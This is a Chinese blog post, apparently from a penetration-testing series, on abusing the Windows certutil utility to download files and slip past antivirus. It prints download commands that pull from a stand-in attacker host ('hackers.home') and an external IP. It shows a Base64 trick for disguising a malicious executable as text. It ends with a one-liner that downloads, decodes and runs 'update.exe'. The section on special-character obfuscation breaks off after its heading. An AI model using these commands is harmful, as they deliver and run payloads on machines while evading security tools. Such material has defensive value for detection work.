内网渗透:九、certutil-远程下载绕过

内网渗透:九、certutil-远程下载绕过

目录

内网渗透:九、certutil-远程下载绕过

一、CertUti

使用语法 :windows

二、certutil绕过*混淆方式


一、CertUti

        Certutil.exe 是作为证书服务的一部分安装的命令行程序。您可以使用 Certutil.exe 转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件以及验证证书、密钥对和证书链。

当 certutil 在没有附加参数的证书颁发机构上运行时,它会显示当前的证书颁发机构配置。在非认证机构上运行 cerutil 时,该命令默认运行 certutil -dump动词。

使用语法 :windows

 

certutil.exe -urlcache -split -f [URL]output.file
certutil  -urlcache  -split  -f  http://192.168.17.136:8000/1.txt

二、certutil绕过*混淆方式

  • 使用CertUtil + Base64来绕过安全软件

经过Base64对恶意文件进行编码,使恶意代码样本看起来像是无害的文本文件,而后使用CertUtil.exe下载后对其进行解码。下载了文本文件使用“Certutil.exe -decode”命令将Base64编码文件解码为可执行文件。服务器

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt 

C:\Temp>certutil.exe -decode bad.txt bad.exe 

 

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64&certutil -decode update.b64 update.exe&update.exe
  • 使用特殊符号(windwos会忽略的)
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值